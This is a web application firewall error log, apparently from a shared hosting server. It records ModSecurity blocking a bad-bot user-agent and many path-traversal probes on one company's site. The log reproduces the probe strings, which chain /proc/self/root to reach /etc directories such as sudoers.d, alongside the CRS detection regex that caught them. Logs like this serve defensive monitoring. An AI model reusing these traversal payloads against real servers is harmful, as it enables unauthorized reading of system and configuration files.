[Mon Mar 16 13:09:06.227193 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.244.31:47606] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgrIv9ocpUE4ed4uDzxcQAAAhM"]
[Mon Mar 16 13:09:20.960275 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.241.46:40228] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgrMLABkC4fWIHEf8Ht7QAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:09:42.605083 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.241.46:42908] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgrRrABkC4fWIHEf8HuAQAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:09:45.082213 2026] [:error] [pid 21946:tid 140411725141760] [client 74.7.241.46:47782] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgrSXbQATo66fKoS7xSZQAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:09:55.166275 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.241.46:47792] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgrU7ysWC90G-1nBrBHggAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:10:46.814638 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.243.203:40824] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgrhnjZBu2q05ozVU9bNQAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:11:01.591348 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.241.46:50048] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgrlY6lpbStxTqkSktu4QAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:11:10.632287 2026] [:error] [pid 32654:tid 140411725141760] [client 74.7.241.46:58596] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgrnglT9VtDQc7bgUy1tAAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:11:16.951654 2026] [:error] [pid 32654:tid 140411725141760] [client 74.7.241.46:42622] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgrpAlT9VtDQc7bgUy1uQAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Mon Mar 16 13:11:23.354587 2026] [:error] [pid 15968:tid 140411607643904] [client 74.7.243.203:41776] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgrq69Q3DFy3Odql0Cu9QAAA5A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:11:26.853522 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.243.203:59814] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgrrpqj1wV0Si-OkefwqAAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:11:27.878924 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.241.46:53274] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgrr5qj1wV0Si-OkefwqQAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:11:29.307168 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.241.46:49466] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgrsXjZBu2q05ozVU9bOQAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:11:32.891588 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.243.203:59830] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgrtP9ocpUE4ed4uDzxlAAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:12:01.795825 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.243.203:46482] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgr0Y6lpbStxTqkSktu_wAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:12:03.107518 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.243.203:38476] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgr06QpVkWug9HeOt84XQAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:12:03.647828 2026] [:error] [pid 15061:tid 140411607643904] [client 74.7.241.46:49472] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgr06TCbgAP5jq5TegsfQAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:12:06.667531 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.243.203:38480] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgr1v9ocpUE4ed4uDzxnQAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:12:10.122230 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.243.203:38486] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgr2lajLEzk2WiQ-10VvQAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:12:14.521098 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.241.46:36712] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgr3nbQATo66fKoS7xSgQAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:12:15.668618 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.243.203:42482] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgr3wlT9VtDQc7bgUy1-AAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:12:17.075994 2026] [:error] [pid 21946:tid 140411632822016] [client 74.7.241.46:38660] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgr4XbQATo66fKoS7xSgwAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:12:23.467117 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.241.46:33212] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgr56QpVkWug9HeOt84ZAAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
